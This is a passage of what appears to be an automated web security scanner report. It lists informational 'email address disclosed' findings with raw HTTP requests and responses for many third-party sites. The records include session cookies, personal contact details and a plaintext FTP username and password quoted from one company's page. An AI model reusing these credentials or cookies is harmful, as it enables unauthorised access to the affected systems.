Path:   /brands/SOU/soundpathwebconferencing_mm/soundpathwebconferencing_mm_install.exe

Issue detail

The following email address was disclosed in the response:

Request

GET /brands/SOU/soundpathwebconferencing_mm/soundpathwebconferencing_mm_install.exe HTTP/1.1
Host: www.conferenceservers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.soundpatheview.com/
Cookie: ASPSESSIONIDQCAATBRT=MCBAGIKBAKINNJGFEALBPACN

Response

HTTP/1.1 200 OK
Content-Length: 3272440
Content-Type: application/octet-stream
Last-Modified: Sun, 08 May 2011 01:42:32 GMT
Accept-Ranges: bytes
ETag: "1f69cd3221dcc1:4129"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR OPTa BUS OTC"
X-UA-Compatible: IE=EmulateIE8
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:33:12 GMT
Connection: close

MZ......................@.............................................    .!..L.!This program cannot be run in DOS mode.
$...............................V...........W...................................
...[SNIP]...
"true"
enablegivecontrolmenu "true"
summaryreport_displayname ""
summaryreport_email ""
summaryreport_subject ""
attendeeinvitation_displayname "Soundpath Conferencing"
attendeeinvitation_email "customerservice@soundpath.net"
attendeeinvitation_subject "Soundpath Meeting Invitation"
enablescaling "true"
enablechathost "true"
enablewaitingroom "undefined"
enablenavigation "true"
enablechatparticipant "true"
enablese
...[SNIP]...
ton1_img ""
custombutton1_cmd ""
custombutton1_caption ""
custombutton1_tooltip ""
custombutton2_img ""
custombutton2_cmd ""
custombutton2_caption ""
custombutton2_tooltip ""
usersupportemail "customerservice@soundpath.net"
usersupportinfourl "https://ash-cs7.conferenceservers.com/docs/user?brand=soundpatheview"
usersupporttelephone "800-606-3494"
usersupporttelephonehours "For assistance during a web session, please
...[SNIP]...

22.44. http://www.csscorp.com/js/mega_dropdown.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csscorp.com
Path:   /js/mega_dropdown.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/mega_dropdown.js HTTP/1.1
Host: www.csscorp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.csscorp.com/
Cookie: csscorp=173.193.214.243.1305201370918613

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:56:12 GMT
Server: Apache/2.2.12 (Unix)
Last-Modified: Tue, 08 Mar 2011 15:09:54 GMT
ETag: "51018e-64e-49dfa012db480"
Accept-Ranges: bytes
Content-Length: 1614
Connection: close
Content-Type: application/x-javascript

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @p
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

22.45. http://www.digiware.net/formularios/form3.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.digiware.net
Path:   /formularios/form3.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /formularios/form3.php HTTP/1.1
Host: www.digiware.net
Proxy-Connection: keep-alive
Referer: http://www.digiware.net/index.php?option=com_wrapper&view=wrapper&Itemid=82
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: f165d946d0a4013e03ebd5d7edb21d2c=o3ue90qurns4h4i2cgin7c1vg1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:07:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 4165
Connection: close
Content-Type: text/html; charset=UTF-8

...<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type"
content="text/html; charset=utf-8">
<title>Untitled Document</title>
</head>
...[SNIP]...
<span style="font-weight: normal;">info-ch@digiware.net</span>
...[SNIP]...
<a href="mailto:info@digiware.net">info@digiware.net</a>
...[SNIP]...
<a href="mailto:info@digiware-pe.net">info-pe@digiware.net</a>
...[SNIP]...
<a href="mailto:info@digiware-ec.net">info-ec@digiware.net</a>
...[SNIP]...
<a href="mailto:info@digiware-usa.net">info-usa@digiware.net</a>
...[SNIP]...

22.46. http://www.foxbusiness.com/static/all/js/jquery.plugins.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxbusiness.com
Path:   /static/all/js/jquery.plugins.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/all/js/jquery.plugins.js?20110511 HTTP/1.1
Host: www.foxbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 11 May 2011 18:05:08 GMT
ETag: "3c3401e-1e428-e9b49d00"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=2799
Date: Thu, 12 May 2011 11:38:10 GMT
Connection: close
Content-Length: 123944

// jQuery Plugins And Extensions. Updated: 09/15/2010

(function($){

/***** jQuery Extensions *****//*
Custom / Opensource extensions
******************************/

// Provides a custom context wh
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

22.47. http://www.friedkanelaw.com/Attorneys/jbh_main.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.friedkanelaw.com
Path:   /Attorneys/jbh_main.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /Attorneys/jbh_main.htm HTTP/1.1
Host: www.friedkanelaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.friedkanelaw.com/Second/attorneys_main.htm

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:28:32 GMT
Content-Length: 5352
Content-Type: text/html
Last-Modified: Fri, 05 Feb 2010 17:08:30 GMT
Accept-Ranges: bytes
ETag: "b28572d785a6ca1:cae"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"><head><meta http-equiv="Co
...[SNIP]...
<a href="mailto:jbh@friedkanelaw.com">jbh@friedkanelaw.com</a>
...[SNIP]...

22.48. http://www.gobignetwork.com/content/js/jquery/jquery.hoverIntent.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gobignetwork.com
Path:   /content/js/jquery/jquery.hoverIntent.js

Issue detail

The following email address was disclosed in the response:

Request

GET /content/js/jquery/jquery.hoverIntent.js HTTP/1.1
Host: www.gobignetwork.com
Proxy-Connection: keep-alive
Referer: http://www.gobignetwork.com/funding
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _referrer=||||http://www.gobignetwork.com/funding||||5/12/2011 7:01 AM

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 26 Apr 2011 18:40:19 GMT
Accept-Ranges: bytes
ETag: "c717e64414cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:01:21 GMT
Content-Length: 1836

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
*
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

22.49. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The following email address was disclosed in the response:

Request

GET /search?q=Benesch+Friedlander+Coplan+%26+Aronoff&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:16:07 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 80442

<!doctype html> <head> <title>Benesch Friedlander Coplan &amp; Aronoff - Google Search</title> <script>window.google={kEI:"h8_LTeebEYLZ0QHv2pX2Bg",kEXPI:"17259,23756,24692,24878,24879,27400,281
...[SNIP]...
</em> LLP &middot; ikaplan@beneschlaw.com <b>
...[SNIP]...

22.50. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The following email address was disclosed in the response:

Request

GET /search?q=Porter+Wright+Morris+%26+Arthur&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:20 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 78506

<!doctype html> <head> <title>Porter Wright Morris &amp; Arthur - Google Search</title> <script>window.google={kEI:"wNDLTcyvKqby0gGL0Yj6Bg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,2850
...[SNIP]...
<div class="s">David Zimmerman dzimmerman@porterwright.com p 614.227.1907 f 614.227.2100 <b>
...[SNIP]...

22.51. http://www.hbsr.com/contact_us/index

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /contact_us/index

Issue detail

The following email address was disclosed in the response:

Request

GET /contact_us/index HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/software
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.4.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:27:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:info@hbsr.com" onclick="return email_verify();" title="Email">info@hbsr.com</a>
...[SNIP]...

22.52. http://www.huroncapital.com/secure/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huroncapital.com
Path:   /secure/

Issue detail

The following email address was disclosed in the response:

Request

GET /secure/ HTTP/1.1
Host: www.huroncapital.com
Proxy-Connection: keep-alive
Referer: http://www.huroncapital.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:13:52 GMT
Server: Apache/1.3.37 (Unix)
AuthUser: -
Set-Cookie: SESSIONID=9d65c422a80d78d0b2c9cee35d9a8062; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8870

<html>

   <head>
       <meta http-equiv="Content-Language" content="en-us">
       <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
       <meta name="generator" content="Adobe GoLive
...[SNIP]...
<a href="mailto:bzylstra@huroncapital.com">bzylstra@huroncapital.com</a>
...[SNIP]...

22.53. http://www.korteco.com/ftp-info

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.korteco.com
Path:   /ftp-info

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ftp-info HTTP/1.1
Host: www.korteco.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.korteco.com/live-project
Cookie: SESS31e5fbde7def436979bdb9291b5781da=0evqcgbv3nlct72jq5nho296j5; has_js=1; __utma=91397376.1526762305.1305205892.1305205892.1305205892.1; __utmb=91397376.2.10.1305205892; __utmc=91397376; __utmz=91397376.1305205892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:12:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Last-Modified: Thu, 12 May 2011 13:12:07 GMT
ETag: "3c6201c70b4fe5571296a07dc19ca3d7"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<a href="mailto:ftphelp@korteco.com">ftphelp@korteco.com</a>
...[SNIP]...
<a href="ftp://username:password@ftp.site.com" title="ftp://username:password@ftp.site.com">ftp://username:password@ftp.site.com</a>
...[SNIP]...
<a href="ftp://subcontractor:shovel55@tkcftp.korteco.com" title="ftp://subcontractor:shovel55@tkcftp.korteco.com">ftp://subcontractor:shovel55@tkcftp.korteco.com</a>
...[SNIP]...
<a href="mailto:ftphelp@korteco.com">ftphelp@korteco.com</a>
...[SNIP]...

22.54. http://www.milbank.com/en/Alumni/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.milbank.com
Path:   /en/Alumni/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/Alumni/ HTTP/1.1
Host: www.milbank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.milbank.com/en/AboutUsHistory/
Cookie: ASP.NET_SessionId=2l3npqztwgswxyek3nbgdm45

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:30:24 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12940


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
   <HEAD>
       <title>Milbank Alumni</title>
       
       <meta name="GENERAT
...[SNIP]...
<a title="mailto:alumni@milbank.com" href="mailto:alumni@milbank.com">alumni@milbank.com</a>
...[SNIP]...

22.55. http://www.mimecast.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mimecast.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ASP.NET_SessionId=lceka2nmzsc44jouj2at51w5; MimecastcomTracker=id=1762891

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 11 May 2011 12:37:49 GMT
Vary: Accept-Encoding
Set-Cookie: MimecastcomRegion=North America; expires=Fri, 11-May-2012 12:37:49 GMT; path=/
Date: Thu, 12 May 2011 12:37:50 GMT
Content-Length: 61607

...

<!DOCTYPE HTML>
<html>
<head id="ctl00_Head1"><meta charset="utf-8" /><title>Mimecast Email Management | Unified Email Management Solutions</title>
<META NAME="DESCRIPTION" CONTENT="Mimecast
...[SNIP]...
<a href="mailto:info@mimecast.com">
...[SNIP]...

22.56. http://www.mimecast.com/About-us/Contact-us/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mimecast.com
Path:   /About-us/Contact-us/

Issue detail

The following email address was disclosed in the response:

Request

GET /About-us/Contact-us/ HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ASP.NET_SessionId=lceka2nmzsc44jouj2at51w5; MimecastcomTracker=id=1762891

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 11 May 2011 12:37:48 GMT
Vary: Accept-Encoding
Set-Cookie: MimecastcomRegion=North America; expires=Fri, 11-May-2012 12:37:48 GMT; path=/
Date: Thu, 12 May 2011 12:37:48 GMT
Content-Length: 106303

...

<!DOCTYPE HTML>
<html>
<head id="ctl00_ctl00_Head1"><meta charset="utf-8" /><title>Contact Mimecast | Product Inquiry | Demo Request</title>
<META NAME="DESCRIPTION" CONTENT="If you have an i
...[SNIP]...
<a href="mailto:info@mimecast.com">
...[SNIP]...

22.57. http://www.mimecast.com/Customers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mimecast.com
Path:   /Customers/

Issue detail

The following email address was disclosed in the response:

Request

GET /Customers/ HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/What-we-offer/
Cookie: ASP.NET_SessionId=jog5wjepoenulrevfy0j33fx; MimecastcomTracker=id=1762893; MimecastcomRegion=North America; __utma=147046443.160771080.1305203710.1305203710.1305203710.1; __utmb=147046443.3.10.1305203710; __utmc=147046443; __utmz=147046443.1305203710.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 11 May 2011 12:39:14 GMT
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:39:14 GMT
Content-Length: 59462

...

<!DOCTYPE HTML>
<html>
<head id="ctl00_ctl00_Head1"><meta charset="utf-8" /><title>Mimecast Reviews | Mimecast Customers</title>
<META NAME="DESCRIPTION" CONTENT="With renewal rates running a
...[SNIP]...
<a href="mailto:info@mimecast.com">
...[SNIP]...

22.58. http://www.mimecast.com/How-to-buy/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mimecast.com
Path:   /How-to-buy/

Issue detail

The following email address was disclosed in the response:

Request

GET /How-to-buy/ HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/
Cookie: ASP.NET_SessionId=jog5wjepoenulrevfy0j33fx; MimecastcomTracker=id=1762893; MimecastcomRegion=North America; __utma=147046443.160771080.1305203710.1305203710.1305203710.1; __utmb=147046443.5.10.1305203710; __utmc=147046443; __utmz=147046443.1305203710.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 11 May 2011 12:39:31 GMT
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:39:31 GMT
Content-Length: 87694

...

<!DOCTYPE HTML>
<html>
<head id="ctl00_Head1"><meta charset="utf-8" /><title>Mimecast Pricing | Find the Best Cost Solution for Your Business</title>
<META NAME="DESCRIPTION" CONTENT="Mimecas
...[SNIP]...
<a href="mailto:info@mimecast.com">
...[SNIP]...

22.59. http://www.mimecast.com/News-and-views/Press-releases/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mimecast.com
Path:   /News-and-views/Press-releases/

Issue detail

The following email address was disclosed in the response:

Request

GET /News-and-views/Press-releases/ HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/What-we-offer/
Cookie: ASP.NET_SessionId=jog5wjepoenulrevfy0j33fx; MimecastcomTracker=id=1762893; MimecastcomRegion=North America; __utma=147046443.160771080.1305203710.1305203710.1305203710.1; __utmb=147046443.3.10.1305203710; __utmc=147046443; __utmz=147046443.1305203710.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 11 May 2011 12:39:18 GMT
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:39:17 GMT
Content-Length: 44075

...

<!DOCTYPE HTML>
<html>
<head id="ctl00_ctl00_Head1"><meta charset="utf-8" /><title>Mimecast Press Releases | Mimecast News</title>
<META NAME="DESCRIPTION" CONTENT="Read Mimecast press releas
...[SNIP]...
<a href="mailto:info@mimecast.com">
...[SNIP]...

22.60. http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mimecast.com
Path:   /News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/

Issue detail

The following email address was disclosed in the response:

Request

GET /News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/ HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/
Cookie: ASP.NET_SessionId=jog5wjepoenulrevfy0j33fx; MimecastcomTracker=id=1762893; MimecastcomRegion=North America; __utma=147046443.160771080.1305203710.1305203710.1305203710.1; __utmb=147046443.4.10.1305203710; __utmc=147046443; __utmz=147046443.1305203710.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 11 May 2011 12:39:26 GMT
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:39:26 GMT
Content-Length: 29960

...

<!DOCTYPE HTML>
<html>
<head id="ctl00_ctl00_Head1"><meta charset="utf-8" /><title>Mimecast</title>


<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
       <meta name="viewpor
...[SNIP]...
<a href="mailto:info@mimecast.com">
...[SNIP]...

22.61. http://www.mimecast.com/Scripts/howtobuy.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mimecast.com
Path:   /Scripts/howtobuy.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Scripts/howtobuy.js HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/How-to-buy/
Cookie: ASP.NET_SessionId=jog5wjepoenulrevfy0j33fx; MimecastcomTracker=id=1762893; MimecastcomRegion=North America; __utma=147046443.160771080.1305203710.1305203710.1305203710.1; __utmb=147046443.5.10.1305203710; __utmc=147046443; __utmz=147046443.1305203710.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=303c07d-12fe4358101-13064b3c-1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Tue, 22 Feb 2011 15:50:56 GMT
Accept-Ranges: bytes
ETag: "7721274ba8d2cb1:0"
Vary: Accept-Encoding
